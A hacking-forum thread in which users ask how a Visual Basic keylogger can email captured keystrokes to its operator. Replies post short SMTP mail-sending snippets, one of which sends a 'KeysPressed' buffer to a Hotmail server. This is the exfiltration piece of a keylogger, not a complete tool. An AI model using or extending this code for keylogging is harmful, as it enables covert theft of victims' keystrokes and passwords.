Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Programming › Visual Basic Programming › [Question] Visual Basics Keylogger

[Question] Visual Basics Keylogger

Posts 1–11 of 11 · Page 1 of 1
Pixie
Pixie
[Question] Visual Basics Keylogger
I was looking at some keyloggers lately, and it looks like they can give people keyloggers by email
Like Celebb's keylogger
Does it really send them a keylogger that records all keys pressed??
If this is true, could some one please make a tutorial on it??
#1 · 16y ago
Visual Basic
Visual Basic
I can attempt to.
#2 · 16y ago
N3XON
N3XON
Pixie Thats a Great question , Cause i bet alot of people have been wondering that,



One person example, Moi ;D

Thanks for making this thread,
#3 · 16y ago
Calebb
Calebb
It sends logs to your email. It records keystrokes.
You can have tons of options, Just depends on how deep you get in.
There pretty easy to stop, unless you disable task manager, and disable deletion.
You have to make a stub in order for it to make the keylogger. It can get advanced. :/
I'm not gonna release a Tut, because then there'd be choobs having keyloggers binded to there releases.
#4 · 16y ago
MN
mnpeep
can you release how to send info to your email?
#5 · 16y ago
Visual Basic
Visual Basic
thats easy.........
#6 · 16y ago
MN
mnpeep
WELL HOW THEN?
im asking for basic code like send.email.***@***.com(textbox1.text)
#7 · edited 16y ago · 16y ago
Visual Basic
Visual Basic
Code:
Dim MyMailMessage As New MailMessage()
MyMailMessage.Body = KeysPressed
Dim SMTPServer As New SmtpClient("smtp.live.com")
SMTPServer.Send(MyMailMessage)
#8 · 16y ago
Calebb
Calebb
Code:
 Dim smtpServer As New SmtpClient()
        Dim mail As New MailMessage()
        smtpServer.Credentials = New Net.NetworkCredential("Youremailaddress", "password")
        'using gmail
        smtpServer.Port = 587
        smtpServer.Host = "smtp.gmail.com"
        smtpServer.EnableSsl = True
        mail = New MailMessage()
        mail.From = New MailAddress(Textbox, or a email)
        mail.To.Add(TextBox1.Text) <-- W/e Textbox
        mail.Subject = "Username: " & TextBox2.Text  <-- W/e Textbox
        mail.Body = "Username : " & TextBox3.Text   <-- W/e Textbox

        smtpServer.Send(mail)
Code:
Imports System.Net.Mail
^^ above formnumber w/e
#9 · 16y ago
MN
mnpeep
hmmm. so 1st one is hotmail and 2nd is gmail?
#10 · 16y ago
Pixie
Pixie
Quote Originally Posted by mnpeep View Post
hmmm. so 1st one is hotmail and 2nd is gmail?
Just forget it...
/Closed
#11 · 16y ago
Posts 1–11 of 11 · Page 1 of 1

Post a Reply

Similar Threads

  • [TUT] Visual Basic - KeyloggerBy tempta43 in Visual Basic Programming
    17Last post 16y ago
  • [Question]BASIC vs Visual Basic (VB) vs Power BasicBy Insaиity in Visual Basic Programming
    2Last post 15y ago
  • visual basic questionsBy nikryj in WarRock - International Hacks
    4Last post 18y ago
  • Visual Basic questionBy steven_italy in Visual Basic Programming
    14Last post 18y ago
  • Packets & Visual BasicBy BadBob in Hack Requests
    5Last post 20y ago

Tags for this Thread

None